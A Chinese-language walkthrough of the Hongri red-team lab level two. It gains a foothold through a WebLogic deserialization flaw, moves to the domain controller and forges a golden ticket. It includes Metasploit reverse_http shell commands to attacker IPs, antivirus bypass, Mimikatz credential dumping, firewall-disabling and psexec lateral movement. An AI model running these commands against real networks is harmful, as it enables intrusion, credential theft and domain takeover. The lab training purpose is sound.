红日靶场第二关

红日靶场第二关

红日靶场第二关

一、环境配置

环境说明
内网网段：10.10.10.1/24
DMZ网段：192.168.111.1/24
测试机地址：192.168.111.1（Windows），192.168.111.11（Linux）
防火墙策略（策略设置过后，测试机只能访问192段地址，模拟公网访问）：
deny all tcp ports：10.10.10.1
allow all tcp ports：10.10.10.0/24
配置信息
DC
IP：10.10.10.10OS：Windows 2012(64)
应用：AD域
WEB
IP1：10.10.10.80IP2：192.168.111.80OS：Windows 2008(64)
应用：Weblogic 10.3.6MSSQL 2008
PC
IP1：10.10.10.201IP2：192.168.111.201OS：Windows 7(32)

环境配置踩坑点：当登录WEB虚拟机时，需要先恢复快照3，登陆时切换用户为:WEBde1ay 密码:1qaz@WSX才能进入，进入目录C:OracleMiddlewareuser_projectsdomainsbase_domain，运行statweblogic服务。

二、目标

红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码：1qaz@WSXBypass UACWindows系统NTLM获取（理论知识：Windows认证）Access Token利用（MSSQL利用）WMI利用网页代理，二层代理，特殊协议代理（DNS，ICMP）域内信息收集域漏洞利用：SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用域凭证收集后门技术（黄金票据/白银票据/Sid History/MOF）

三、WEB外网打点

3.1信息收集(nmap):

访问7001端口，发现作妖处：

3.2信息收集(dirsearch)：

3.3漏洞检测

网上公开有漏洞，印象深刻的是未授权的漏洞，但是进去之后很难找到用户名和密码，直接用weblogic漏洞工具检测。

存在CVE_2020_2551漏洞

存在CVE_2019_2725漏洞

CVE_2019_2725漏洞对应JAVA反序列化漏洞，可以直接工具。

拿下服务器：

### 3.4更新（无关闭防火墙上线）

通过上面的weblogic扫描发现，SSRF漏洞存在于ip:7001/uddiexplorer/SearchPublicRegistries.jsp

MSF：
> use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
> set rhosts 192.168.235.80
> set lhost 192.168.235.129
> set target 1
> set payload windows/meterpreter/reverse_http
> background 拿到session 1 
弹给CS：
> use exploit/windows/local/payload_inject
> set payload windows/meterpreter/reverse_http
> set DisablePayloadHandler true
> set lhost 192.168.111.129
> set lport 3333
> set session 1

上线后提权，后续步骤一样：

四、内网渗透

4.1 上线CS

4.1.1 发现360杀软

4.1.2 powershell绕过360杀软

反弹CS成功：

4.2 信息收集

4.2.1 判断是否存在域

ipconfig /all ，DNS后缀de1ay，存在域

net config workstation

4.2.2 提权(MS14-58)

测试权限shell net view /domain

提权成功

4.2.3 获取凭证

access—>hash dump

Mimikatz抓取

4.2.4 继续信息收集

ipconfig /all
net config workstation                      # 当前登录域
netsh advfirewall set allprofiles state off # 关闭防火墙net time /domain                       # Ping获取域控IP
nltest /dsgetdc:<domain_name>          # 也可以获取域控IPnet view /domain
net view                                 # 域内主机
net user /domain                         # 域内用户
net group "domain admins" /domain        # 域管理员
net group "domain controllers" /domain   # 域控

域内主机：

资产收集：（ICMP)协议

4.2.5 开启3389

4.3 内网横向

4.3.1 MSF联动CS

• 通过payload_inject将Shell发给CS

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use exploit/windows/local/payload_inject 
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.111.2
msf6 exploit(windows/local/payload_inject) > set LPORT 10080
msf6 exploit(windows/local/payload_inject) > set session 1
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf6 exploit(windows/local/payload_inject) > run

4.3.2 CS联动MSF

# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用x64
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port>   # 设置任意端口进行监听
# 启动监听器
msf> run

4.3.3 上线CS目标

portscan 10.10.10.1/24 445 arp 200

)]

4.4 psexec传递

4.4.1 拿下PC

获取凭据后，需要对目标网段进行端口存活探测，缩小范围。探测方式比较多，本文仅依托CobalStrike本身完成，不借助其他工具。因为是psexec传递登录，这里仅需探测445端口。（ psexec：在主机上使用服务派生会话 ）

)]

4.4.2 拿下DC

4.4.1 配置监听

4.4.2 psexec传递给DC

拿下域控！！！

五、权限维持（黄金票据）

5.1 查看账户NTLM HASH和SID值

5.2 黄金票据利用

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心（KDC）证明用户已被其他域控制器认证。
黄金票据的条件要求：
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限，上面已经获得域控的 system 权限了，还可以使用黄金票据做权限维持，当域控权限掉后，在通过域内其他任意机器伪造票据重新获取最高权限。

• WEB机 Administrator 权限机器->右键->Access->Golden Ticket

运行中

5.2.1伪造用户名成功

shell dir DCC$